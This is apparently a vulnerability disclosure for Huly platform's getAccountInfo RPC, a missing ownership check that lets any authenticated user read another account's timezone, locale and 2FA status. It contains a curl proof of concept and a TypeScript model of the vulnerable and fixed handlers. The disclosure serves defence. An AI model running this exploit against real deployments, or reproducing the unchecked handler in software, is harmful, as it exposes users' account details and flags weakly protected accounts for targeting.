Submission #832974: Huly hcengineering/platform <= 0.7.0 (confirmed on commit 18ef71b) Authorization Bypass Through User-Controlled SQL Primary Key

Title: Huly hcengineering/platform <= 0.7.0 (confirmed on commit 18ef71b) Authorization Bypass Through User-Controlled SQL Primary Key
Description:

https://github.com/hcengineering/platform

Title: Account Info Disclosure -- Any Authenticated User Can Read Another User's Locale, Timezone, and 2FA Status
Package: hcengineering/platform
Affected Versions: <= 0.7.0 (confirmed on commit 18ef71b)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE: CWE-639 -- Authorization Bypass Through User-Controlled Key

## GitHub Advisory

### Summary

The `getAccountInfo` RPC method in Huly's account service accepts an arbitrary `accountId` UUID and returns that account's timezone, locale, and 2FA-enabled status. The caller's identity is validated (valid JWT required) but the return value of `decodeTokenVerbose` is discarded and no ownership check is performed. Any authenticated user can look up this information for any other account UUID.

### Details

The vulnerable handler is `getAccountInfo` in `server/account/src/operations.ts:2389-2407`:

```typescript
export async function getAccountInfo (
  ctx: MeasureContext,
  db: AccountDB,
  branding: Branding | null,
  token: string,
  params: { accountId: AccountUuid }
): Promise<AccountInfo> {
  const { accountId } = params // ← taken directly from caller's request
  if (accountId == null || accountId === '') {
    throw new PlatformError(...)
  }
  decodeTokenVerbose(ctx, token) // ← validates token, return value discarded
  const account = await getAccount(db, accountId)
  ...
  return {
    timezone: account?.timezone,
    locale: account?.locale,
    tfaEnabled: account?.tfaSecret != null
  }
}
```

`decodeTokenVerbose` returns `{ account, extra, ... }` containing the caller's identity, but the return value is not used. The function simply validates that the token is syntactically valid, then fetches and returns the record for the caller-supplied `accountId` without verifying it matches the token's `account`.

The method is registered in the public dispatch table (`server/account/src/operations.ts:3247, 3349`).

**Data exposed:** `timezone` (e.g. "America/New_York"), `locale` (e.g. "en-US"), `tfaEnabled` (boolean indicating whether TOTP is configured). No passwords or PII.

### PoC

Prerequisites: Two Huly user accounts. Attacker knows (or can enumerate) the target account UUID.

```bash
ATTACKER_TOKEN=$(curl -s -X POST https://huly-host/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"AttackerPass"}' | jq -r '.token')

curl -s -X POST https://huly-host/ \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $ATTACKER_TOKEN" \
  -d '{"method":"getAccountInfo","params":{"accountId":"<victim-account-uuid>"}}'
```

Response:

```json
{"result":{"timezone":"America/New_York","locale":"en-US","tfaEnabled":false}}
```

### Impact

Any authenticated user can determine the timezone, locale, and 2FA enrollment status of any other account. The 2FA status flag could assist in targeting accounts with weaker authentication. The information is not highly sensitive but the cross-account read violates the principle of least privilege.

Fix: compare the `accountId` parameter to the caller's account UUID returned by `decodeTokenVerbose`, and reject requests where they differ (unless the caller is an admin).
Source: https://github.com/hcengineering/platform
User: geochen (UID 78995)
Submitted: 19/05/2026 10:12 (27 days ago)
Moderated: 14/06/2026 14:38 (26 days later)
Status: Accepted
VulDB Entry: 370855 [hcengineering Huly Platform up to 0.7.0 User Information operations.ts getAccountInfo privilege escalation]
Points: 20
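The fix the submission proposes (bind the lookup to the identity carried in the token, and allow a mismatch only for admins), shown as an added TypeScript example. This is not code from the Huly project: the token decoder, the account store and the admin marker in the token's `extra` field are stand-ins so the vulnerable and fixed handlers can be run side by side offline.

```typescript
// Added example (not Huly project code). Models the vulnerable getAccountInfo
// handler from the advisory next to the fix it proposes. decodeTokenVerboseStub,
// the in-memory account store and the `extra.admin` marker are assumptions.

type AccountUuid = string

// Shape the advisory attributes to decodeTokenVerbose: { account, extra, ... }
interface TokenClaims {
  account: AccountUuid
  extra: Record<string, string>
}

interface AccountRecord {
  timezone?: string
  locale?: string
  tfaSecret?: string
}

interface AccountInfo {
  timezone?: string
  locale?: string
  tfaEnabled: boolean
}

class PlatformError extends Error {
  readonly code: string
  constructor(code: string, message: string) {
    super(message)
    this.code = code
    this.name = 'PlatformError'
  }
}

// Constructed sample accounts (placeholder UUIDs, not real data).
const ATTACKER_UUID: AccountUuid = '00000000-0000-4000-8000-00000000000a'
const VICTIM_UUID: AccountUuid = '00000000-0000-4000-8000-00000000000b'
const ADMIN_UUID: AccountUuid = '00000000-0000-4000-8000-00000000000c'

const accounts: Record<AccountUuid, AccountRecord> = {
  [ATTACKER_UUID]: { timezone: 'Europe/Berlin', locale: 'de-DE' },
  [VICTIM_UUID]: { timezone: 'America/New_York', locale: 'en-US', tfaSecret: 'constructed-totp-secret' },
  [ADMIN_UUID]: { timezone: 'UTC', locale: 'en-GB' }
}

// Stand-in for decodeTokenVerbose. Real tokens are signed JWTs; here a token is
// "<uuid>" or "<uuid>;admin" so the example runs offline. In production the
// admin claim must come from the signed token, never from the request body.
function decodeTokenVerboseStub(token: string): TokenClaims {
  const parts = token.split(';')
  const account = parts[0]
  if (!Object.prototype.hasOwnProperty.call(accounts, account)) {
    throw new PlatformError('unauthorized', 'invalid token')
  }
  const extra: Record<string, string> = parts.indexOf('admin') !== -1 ? { admin: 'true' } : {}
  return { account, extra }
}

function toInfo(account: AccountRecord | undefined): AccountInfo {
  return {
    timezone: account?.timezone,
    locale: account?.locale,
    tfaEnabled: account?.tfaSecret != null
  }
}

// Vulnerable shape: the token is only checked for validity; its claims are
// discarded and the caller-supplied accountId is looked up unconditionally.
function getAccountInfoVulnerable(token: string, params: { accountId: AccountUuid }): AccountInfo {
  const { accountId } = params
  if (accountId == null || accountId === '') {
    throw new PlatformError('bad-request', 'accountId required')
  }
  decodeTokenVerboseStub(token) // return value discarded
  return toInfo(accounts[accountId])
}

// Fixed shape: the lookup is bound to the identity inside the token.
function getAccountInfoFixed(token: string, params: { accountId: AccountUuid }): AccountInfo {
  const { accountId } = params
  if (accountId == null || accountId === '') {
    throw new PlatformError('bad-request', 'accountId required')
  }
  const { account, extra } = decodeTokenVerboseStub(token)
  const isAdmin = extra.admin === 'true'
  if (accountId !== account && !isAdmin) {
    // Fail closed before touching the store: the same error is returned whether
    // or not the target UUID exists, so the rejection confirms nothing.
    throw new PlatformError('forbidden', 'accountId does not match caller')
  }
  return toInfo(accounts[accountId])
}

// Helper: true if fn throws a PlatformError carrying the given code.
function throwsWithCode(fn: () => unknown, code: string): boolean {
  try {
    fn()
    return false
  } catch (e) {
    return typeof e === 'object' && e !== null && (e as { code?: string }).code === code
  }
}
```

The ownership comparison runs before the database read, so a rejected request costs no lookup and reveals nothing about whether the requested UUID exists. An admin path is kept only because the submission's proposed fix allows one; if the deployment has no such role, drop the `isAdmin` branch entirely.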
